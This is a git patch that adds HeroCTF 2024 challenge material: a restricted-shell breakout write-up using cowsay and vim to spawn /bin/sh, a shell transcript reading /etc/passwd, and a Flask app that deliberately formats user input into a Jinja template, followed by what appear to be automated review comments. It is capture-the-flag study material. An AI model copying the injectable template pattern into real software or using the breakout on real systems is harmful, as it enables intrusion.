From 031517a34dd0c01d26f9bf2f5098163a59bd2b56 Mon Sep 17 00:00:00 2001
From: agatha
Date: Fri, 25 Oct 2024 17:23:01 -0400
Subject: [PATCH] add web/jinjatic
---
misc/cloud_shell/README.md | 75 ++++++++++++++++
misc/{ => free_shell}/free_shell.py | 0
misc/moo/README.md | 80 ++++++++++++++++++
web/jinjatic/jinjatic.tar.xz | Bin 0 -> 2196 bytes
web/jinjatic/jinjatic/docker-compose.yml | 14 +++
web/jinjatic/jinjatic/src/Dockerfile | 26 ++++++
web/jinjatic/jinjatic/src/challenge/app.py | 53 ++++++++++++
.../jinjatic/src/challenge/requirements.txt | 4 +
.../src/challenge/templates/home.html | 21 +++++
.../src/challenge/templates/mail.html | 35 ++++++++
.../src/challenge/templates/result.html | 21 +++++
web/jinjatic/jinjatic/src/flag.txt | 1 +
web/jinjatic/jinjatic/src/getflag.c | 21 +++++
web/pryzes/PrYzes/solver.py | 22 +++++
14 files changed, 373 insertions(+)
create mode 100644 misc/cloud_shell/README.md
rename misc/{ => free_shell}/free_shell.py (100%)
create mode 100644 misc/moo/README.md
create mode 100644 web/jinjatic/jinjatic.tar.xz
create mode 100644 web/jinjatic/jinjatic/docker-compose.yml
create mode 100644 web/jinjatic/jinjatic/src/Dockerfile
create mode 100644 web/jinjatic/jinjatic/src/challenge/app.py
create mode 100644 web/jinjatic/jinjatic/src/challenge/requirements.txt
create mode 100644 web/jinjatic/jinjatic/src/challenge/templates/home.html
create mode 100644 web/jinjatic/jinjatic/src/challenge/templates/mail.html
create mode 100644 web/jinjatic/jinjatic/src/challenge/templates/result.html
create mode 100644 web/jinjatic/jinjatic/src/flag.txt
create mode 100644 web/jinjatic/jinjatic/src/getflag.c
create mode 100644 web/pryzes/PrYzes/solver.py
diff --git a/misc/cloud_shell/README.md b/misc/cloud_shell/README.md
new file mode 100644
index 0000000..0b2a16c
--- /dev/null
+++ b/misc/cloud_shell/README.md
@@ -0,0 +1,75 @@
+```
+/ $ echo $PATH
+/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+/ $ ls -l /usr/local/sbin
+ls: /usr/local/sbin: No such file or directory
+/ $ ls -l /usr/local/bin
+ls: /usr/local/bin: No such file or directory
+/ $ ls -l /usr/sbin
+ls: /usr/sbin: No such file or directory
+/ $ ls -l /usr/bin
+ls: /usr/bin: No such file or directory
+/ $ ls -l /sbin
+ls: /sbin: No such file or directory
+/ $ ls -l /bin
+total 4120
+-rwxr-xr-x 1 root 0 808712 Oct 24 17:14 cat
+-rwxr-xr-x 2 root 0 443480 Oct 24 17:14 cloud_cat
+-rwxr-xr-x 1 root 0 443480 Oct 24 17:14 cloud_create
+-rwxr-xr-x 1 root 0 443480 Oct 24 17:14 cloud_list
+-rwxr-xr-x 1 root 0 443480 Oct 24 17:14 cloud_mv
+-rwxr-xr-x 1 root 0 808712 Oct 24 17:14 ls
+-rwxr-xr-x 1 root 0 808712 Oct 24 17:14 sh
+```
+
+```
+/ $ cat /etc/passwd
+root:x:0:0:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/mail:/sbin/nologin
+news:x:9:13:news:/usr/lib/news:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+games:x:35:35:games:/usr/games:/sbin/nologin
+ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+guest:x:405:100:guest:/dev/null:/sbin/nologin
+nobody:x:65534:65534:nobody:/:/sbin/nologin
+gaoler:x:1000:1000:Linux User,,,:/home/gaoler:/bin/sh
+restricted:x:1001:1001:Linux User,,,:/home/restricted:/bin/jail
+```
+
+```
+ ____ _ _ ____ _ _ _
+ / ___| | ___ _ _ __| | / ___|| |__ ___| | |
+| | | |/ _ \| | | |/ _` | \___ \| '_ \ / _ \ | |
+| |___| | (_) | |_| | (_| | ___) | | | | __/ | |
+ \____|_|\___/ \__,_|\__,_| |____/|_| |_|\___|_|_|
+
+
+Welcome to Cloud Shell !
+
+Here you can interact with your personal vault using our custom binaries :
+- cloud_cat : Get the content of the specified file
+- cloud_list : List your current file(s)
+- cloud_mv : Rename a file
+- cloud_create : Create a file with his content
+
+If you don't know how to use a binary, just execute it without arguments, help will be provided !
+
+/ $ cloud_cat
+Usage: cloud_cat
+/ $ cloud_list
+cloud_socket
+/ $ cloud_mv
+Usage: cloud_mv
+/ $ cloud_create
+Usage: cloud_create
+/ $
+```
diff --git a/misc/free_shell.py b/misc/free_shell/free_shell.py
similarity index 100%
rename from misc/free_shell.py
rename to misc/free_shell/free_shell.py
diff --git a/misc/moo/README.md b/misc/moo/README.md
new file mode 100644
index 0000000..49d1717
--- /dev/null
+++ b/misc/moo/README.md
@@ -0,0 +1,80 @@
+# misc/Moo
+We are given SSH access to a machine. We drop into a restricted shell and must break out of it to read the flag.
+
+```
+ssh -p 11380 dyn05.heroctf.fr
+user@dyn05.heroctf.fr's password:
+Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64
+
+The programs included with the Debian GNU/Linux system are free software;
+the exact distribution terms for each program are described in the
+individual files in /usr/share/doc/*/copyright.
+
+Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+permitted by applicable law.
+Last login: Fri Oct 25 20:27:41 2024 from 149.102.226.202
+ ______________________________________________________
+/ Welcome dear CTF player! You can read the flag with: \
+\ /bin/sudo /bin/cat /flag.txt. Or can you?... /
+ ------------------------------------------------------
+ \ ^__^
+ \ (oo)\_______
+ (__)\ )\/\
+ ||----w |
+ || ||
+```
+
+When we try to run the commands, we see we're in a restricted shell:
+```
+user@moo:~$ /bin/sudo /bin/cat /flag.txt
+bash: /bin/sudo: restricted: cannot specify `/' in command names
+```
+
+Let's take a look at our environment a bit with `env`:
+```
+bash: env: command not found
+```
+
+Next thing to do would be look at what our `PATH` is set to:
+```
+user@moo:~$ echo $PATH
+/usr/local/rbin
+```
+
+Attempting to update our `PATH` with `export` fails as well:
+```
+user@moo:~$ PATH=/bin sudo id
+bash: PATH: readonly variable
+bash: sudo: command not found
+```
+
+Well, let's see what is actually available to us in the only `PATH` we have available:
+```
+user@moo:~$ ls -la $PATH
+total 24
+drwxr-xr-x 1 root root 4096 Oct 25 18:18 .
+drwxr-xr-x 1 root root 4096 Oct 25 18:18 ..
+lrwxrwxrwx 1 root root 17 Oct 25 18:18 cowsay -> /usr/games/cowsay
+lrwxrwxrwx 1 root root 18 Oct 25 18:18 dircolors -> /usr/bin/dircolors
+lrwxrwxrwx 1 root root 7 Oct 25 18:18 ls -> /bin/ls
+-rwxr-xr-x 1 root root 206 Oct 25 17:35 rbash
+-rwxr-xr-x 1 root root 54 Oct 25 17:35 vim
+```
+
+This reveals a few things:
+- We are in a restricted bashshell
+- We have `cowsay`
+
+So we use `cowsay` as a the GTFObin that it is, however we cannot redirect output. Luckily we have
+`vim`.
+
+After putting our breakout (`exec "/bin/sh";`) into a file, we can then run it with `cowsay`:
+```
+cowsay -f tmp x
+```
+
+This gives us a full unrestricted shell, and we can now `cat` the flag:
+```
+PATH=/bin
+Hero{s0m3_s4cr3d_c0w}
+```
diff --git a/web/jinjatic/jinjatic.tar.xz b/web/jinjatic/jinjatic.tar.xz new file mode 100644 index 0000000000000000000000000000000000000000..087be447460c88f027fc44c5d69de9d3d476f6b6 GIT binary patch literal 2196 zcmV;F2y6HKH+ooF000E$*0e?hz|s(apaCHP8~^|S0000^6v4{iPyYx?T>v#2N*{jF zw-SR>c>Ba*bDrQ4FKCux%G1;6D^XG2L%o_o5-(^@Mf9g5g_3x&Ap+QsjO>*&46m7I z0g}W-1#N&Rp{KIhlNaDucCI{NOd7$WlzSr*bbEE$q7}7Ks6Qbi@VdJ1Vyns?3-Dt@ z?>}8Q|1fbl?}sEZzjaFdhpJnqJOs`Mahl9^n_7y9g5}1|7nFM<(tL8N)-v{u+gIQ!V@&ONAwKt=DzBv#WYl@?NRR$+dHNN}m@93-9A4Bv1->;FU&c z!g@n&Vv3A5``$1~%50Izc%K|~3AW%uDqu10SNrZ8W>L*X&OI=YM6q9uauKdU5|BwW zc6%+SO*J}Htc$Cym@gP(hLmrv!~rud2BU|Z*Wa?(daSNu+@H|X+nmq1l{s(@QgBl*G>HooC zM;W5~9scT;%t18IWNIISjonMEaa3!yrfkcw506Jvq_{nBuSZI$Q>$a-8bN$D@(|j!WDkoS%JD%UYE|;88W& zw0Fp7wNXWf+W>`dLHhA!2P6N}hXScd>Y?-KejL<(vRhjCiy9OMf7 zYZEF=8BKuQD0Dh44PpT2yf`+91gf`*WqoZ5r`ql$)9bjiI|>%)$}zbr3}N);ig*!c z+Cph*c=&W+=2oTRM>JB5xRY5L15{osyYP{hfcykp{#iPeHi=6+L zMCU$tDAoHF(OXxg44k+I*8hNjbAf7Q{nf8ddNzK)u<(`Wx(L=`&`P^=Sm ztFaN}>OETMd+p8tcVccmL$gEhBVQ&tJNVrX6NdbW1F)?fB^WZ z@|SXH87M38&>Jl-LQo3{X^h@Ram+c|+CuYv3t`4}+Tn5zNRGxV>y`r_S-`Nizq!cv zVq0SZ7iTK(&Px9|5^R{PglToe?i6kU+;viy$bc$s$vYj8(VVvpMY0bW$7axTRNbIY z(D=k2txm@KKTF)B>u~fqE{wPT%UupkCI~uSxpf20J)n`4ONsVDV16{l7d=qFOJv?#8p|wT-d`W-~S=FqN(FpzeH z-oBr`wx)VilH}Cqdr6wuelmc@R{%GG`0iXGOOiLFd&udeVFS zu=xsn9&@sRh1q2E{v?Nb&C#<3tU`_pbQ{LO0cRxL2Z1Yz+ z(S8)i$1z#eizfLURTWPXF}b4?ag00l!Z`81yrkmf2A{QBR2)Yq?1tT&6GFCLm#zL0 z->M|@>v$=)?y`xFb`{9TO%Erf_I-d4;d3Kmh@_9==fSU)CoUPhyKO1*0ZcqgT{>_7{M{WR@!@=vAzO^U6QetS#q*E + + + + + Email Result + + + +
+
+

Welcome on the platform !

+

Your email to connect is: %s

+
+ Generate another welcome email +
+
+
+
+
+
+'''
+
+class EmailModel(BaseModel):
+ email: EmailStr
+
+@app.route('/')
+def home():
+ return render_template('home.html')
+
+@app.route('/mail')
+def mail():
+ return render_template('mail.html')
+
+@app.route('/render', methods=['POST'])
+def render_email():
+ email = request.form.get('email')
+
+ try:
+ email_obj = EmailModel(email=email)
+ return Template(email_template%(email)).render()
+ except ValidationError as e:
+ return render_template('mail.html', error="Invalid email format.")
+
+if __name__ == '__main__':
+ app.run(host="0.0.0.0", port=80)
diff --git a/web/jinjatic/jinjatic/src/challenge/requirements.txt b/web/jinjatic/jinjatic/src/challenge/requirements.txt
new file mode 100644
index 0000000..4346070
--- /dev/null
+++ b/web/jinjatic/jinjatic/src/challenge/requirements.txt
@@ -0,0 +1,4 @@
+flask
+pydantic
+pydantic[email]
+jinja2
diff --git a/web/jinjatic/jinjatic/src/challenge/templates/home.html b/web/jinjatic/jinjatic/src/challenge/templates/home.html
new file mode 100644
index 0000000..279ffff
--- /dev/null
+++ b/web/jinjatic/jinjatic/src/challenge/templates/home.html
@@ -0,0 +1,21 @@
+
+
+
+
+
+ Home
+
+
+
+
+

We render, you use it

+

Give us emails of your customers to send them a welcome email.

+ Go to Email Page +
+
+
+
+
+
+
diff --git a/web/jinjatic/jinjatic/src/challenge/templates/mail.html b/web/jinjatic/jinjatic/src/challenge/templates/mail.html
new file mode 100644
index 0000000..693237a
--- /dev/null
+++ b/web/jinjatic/jinjatic/src/challenge/templates/mail.html
@@ -0,0 +1,35 @@
+
+
+
+
+
+ Mail
+
+
+
+
+
+

Enter email of your client

+ + {% if error %} + + {% endif %} + +
+
+ + +
+ +
+
+
+
+
+
+
+
+
diff --git a/web/jinjatic/jinjatic/src/challenge/templates/result.html b/web/jinjatic/jinjatic/src/challenge/templates/result.html
new file mode 100644
index 0000000..0f20315
--- /dev/null
+++ b/web/jinjatic/jinjatic/src/challenge/templates/result.html
@@ -0,0 +1,21 @@
+
+
+
+
+
+ Email Result
+
+
+
+
+

Welcome on the platform !

+

Your email to connect is: {{ email }}

+
+ Generate another welcome email +
+
+
+
+
+
diff --git a/web/jinjatic/jinjatic/src/flag.txt b/web/jinjatic/jinjatic/src/flag.txt
new file mode 100644
index 0000000..508ddf5
--- /dev/null
+++ b/web/jinjatic/jinjatic/src/flag.txt
@@ -0,0 +1 @@
+HERO{FAKE_FLAG}
\ No newline at end of file
diff --git a/web/jinjatic/jinjatic/src/getflag.c b/web/jinjatic/jinjatic/src/getflag.c
new file mode 100644
index 0000000..c96c7eb
--- /dev/null
+++ b/web/jinjatic/jinjatic/src/getflag.c
@@ -0,0 +1,21 @@
+#include
+#include
+
+int main() {
+ const char *file_path = "/root/flag.txt";
+
+ FILE *file = fopen(file_path, "r");
+ if (file == NULL) {
+ perror("Erreur lors de l'ouverture du fichier");
+ return EXIT_FAILURE;
+ }
+
+ char ch;
+ while ((ch = fgetc(file)) != EOF) {
+ putchar(ch);
+ }
+
+ fclose(file);
+
+ return EXIT_SUCCESS;
+}
\ No newline at end of file
diff --git a/web/pryzes/PrYzes/solver.py b/web/pryzes/PrYzes/solver.py
new file mode 100644
index 0000000..4da6a21
--- /dev/null
+++ b/web/pryzes/PrYzes/solver.py
@@ -0,0 +1,22 @@
+import hashlib
+import json
+from datetime import datetime
+
+
+def compute_sha256(data):
+ sha256_hash = hashlib.sha256()
+ sha256_hash.update(data.encode("utf-8"))
+ return sha256_hash.hexdigest()
+
+
+def main():
+ # create datetime object with date 25/10/2121
+ date_obj = datetime.strptime("25/10/2121", "%d/%m/%Y")
+
+ json_data = json.dumps({"date": date_obj.strftime("%d/%m/%Y")})
+ print(compute_sha256(json_data))
+ print(json_data)
+
+
+if __name__ == '__main__':
+ main()
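Review bot: result.html is not rendered by any route visible in this patch; render_email() in app.py instead returns `Template(email_template%(email)).render()`, which %-formats the submitted address into the template source before Jinja parses it. Passing EmailStr validation constrains the shape of the address but does not make it safe to use as template text, so whatever the validator accepts is interpreted as template syntax rather than shown as data. This file already carries the `{{ email }}` placeholder that keeps the value as data, so render_email() could end with `return render_template('result.html', email=email)`. If the string-built template is the intended challenge behaviour, a comment in app.py saying so would keep a later maintainer from treating this unused file as the live path. The opening of app.py's section is not legible on this page, so its imports and the head of email_template are not reviewed here.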
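Review bot: In getflag.c the loop variable is declared `char ch;` but receives the result of fgetc(), which returns an int so that EOF can be told apart from every byte value. With a signed char a 0xFF byte in the file ends the loop early, and on platforms where char is unsigned the test `!= EOF` is always true and the loop never terminates; declare it as `int ch;`. `int main()` would also read better as the prototype form `int main(void)`. The program opens /root/flag.txt, so it is presumably installed with elevated privileges by the Dockerfile (not legible on this page); a header comment stating that, and that it takes no arguments or environment input by design, would document the trust boundary.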
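Review bot: main() in solver.py does not say what consumes the two printed values or why the date is 25/10/2121; a short module docstring stating that would make the script usable without the write-up. The digest is taken over the exact text `json.dumps` emits, so it silently depends on the default separators; a comment next to `json_data` such as `# hash covers json.dumps' default form, including the space after ':'` would record that. The strptime/strftime round-trip uses the same format string in both directions, so `date_obj` only validates the literal, and compute_sha256 can be reduced to `return hashlib.sha256(data.encode("utf-8")).hexdigest()`.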